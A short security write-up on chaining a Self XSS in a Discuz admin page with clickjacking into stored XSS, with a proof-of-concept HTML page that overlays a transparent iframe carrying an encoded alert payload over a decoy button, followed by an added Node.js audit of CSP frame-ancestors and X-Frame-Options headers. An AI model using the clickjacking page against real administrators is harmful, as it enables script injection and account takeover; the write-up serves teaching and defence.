Self XSS + Clickjacking ==> Stored XSS. At http://hi.baidu.com/hacklele/admin.php?frames=yes&action=moderate&operation=threads the page contains a hidden form field "title" that can be submitted via GET; the payload fires once the administrator clicks "Submit". On its own this is a Self XSS and hard to exploit, but the Discuz admin panel can be embedded through an iframe tag, so we can combine it with Clickjacking.
<html>
<head>
<title>Dz XSS Demo</title>
<style type="text/css">
/* visible decoy button, placed underneath the frame */
#click {
  height: 25px;
  width: 60px;
  top: 710px;
  left: 220px;
  position: absolute;
  z-index: 1;
}
/* fully transparent admin frame layered on top of the decoy */
#hidden {
  height: 500px;
  width: 500px;
  top: 320px;
  left: 45px;
  filter: alpha(opacity=0);
  opacity: 0;
  position: absolute;
  z-index: 2;
}
</style>
</head>
<body>
<img src="girl.jpg">
<button id="click">下一页</button>
<iframe id="hidden" src="https://hi.baidu.com/hacklele/admin.php?frames=yes&action=moderate&operation=threads&title=%26%23x27%26%23x29%26%23x22%26%23x29%26%23x3b%26%23x61%26%23x6c%26%23x65%26%23x72%26%23x74%26%23x28%26%23x64%26%23x6f%26%23x63%26%23x75%26%23x6d%26%23x65%26%23x6e%26%23x74%26%23x2e%26%23x64%26%23x6f%26%23x6d%26%23x61%26%23x69%26%23x6e%26%23x29%26%23x3b%26%23x2f%26%23x2f"></iframe>
</body>
</html>
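The demo only works because the admin page can be framed by any origin. As an added example, not part of the original post or of Discuz, the following Node.js audit decides from a response's headers whether a given origin may embed the page (CSP frame-ancestors is honoured before X-Frame-Options, as browsers do), and shows the headers that close the hole; the function names, the `attacker.example` origin and the header samples are constructed for the example.

```javascript
// Added example (not from the original post): can `framerUrl` embed `pageUrl`,
// judging only by the page's response headers? CSP frame-ancestors takes
// precedence over X-Frame-Options; scheme/port matching is simplified.
function originOf(url) {
  const u = new URL(url);
  return { scheme: u.protocol.slice(0, -1), host: u.hostname,
           port: u.port || (u.protocol === 'https:' ? '443' : '80') };
}
function sameOrigin(a, b) {
  return a.scheme === b.scheme && a.host === b.host && a.port === b.port;
}
// Does one frame-ancestors source expression allow `framer` to embed `page`?
function sourceAllows(src, framer, page) {
  src = src.toLowerCase();
  if (src === "'none'") return false;
  if (src === "'self'") return sameOrigin(framer, page);
  if (src === '*') return true;
  if (src === framer.scheme + ':') return true;            // scheme-source, e.g. "https:"
  const m = src.match(/^(?:([a-z]+):\/\/)?(\*\.)?([^:/]+)(?::(\d+|\*))?$/);
  if (!m) return false;                                     // malformed source: fail closed
  const [, scheme, wild, host, port] = m;
  if (scheme && scheme !== framer.scheme) return false;
  const hostOk = wild ? framer.host.endsWith('.' + host) : framer.host === host;
  const want = port || ((scheme || framer.scheme) === 'https' ? '443' : '80');
  return hostOk && (want === '*' || want === framer.port);
}
function canBeFramed(headers, pageUrl, framerUrl) {
  const h = Object.fromEntries(Object.entries(headers).map(([k, v]) => [k.toLowerCase(), v]));
  const page = originOf(pageUrl), framer = originOf(framerUrl);
  const fa = (h['content-security-policy'] || '').split(';')
    .map(d => d.trim().split(/\s+/))
    .find(d => d[0].toLowerCase() === 'frame-ancestors');
  if (fa) return fa.slice(1).some(src => sourceAllows(src, framer, page));
  const xfo = (h['x-frame-options'] || '').trim().toUpperCase();
  if (xfo === 'DENY') return false;
  if (xfo === 'SAMEORIGIN') return sameOrigin(framer, page);
  return true;   // no restriction at all: any site can overlay it as in the demo above
}
// Headers the admin endpoint should send so that no origin can frame it.
function antiFramingHeaders() {
  return { 'X-Frame-Options': 'DENY', 'Content-Security-Policy': "frame-ancestors 'none'" };
}
// Constructed check: the admin URL from the post, framed from a placeholder origin.
const ADMIN_URL = 'https://hi.baidu.com/hacklele/admin.php?frames=yes&action=moderate&operation=threads';
const FRAMER = 'http://attacker.example';   // placeholder, not a real site
console.log(canBeFramed({}, ADMIN_URL, FRAMER), canBeFramed(antiFramingHeaders(), ADMIN_URL, FRAMER));
```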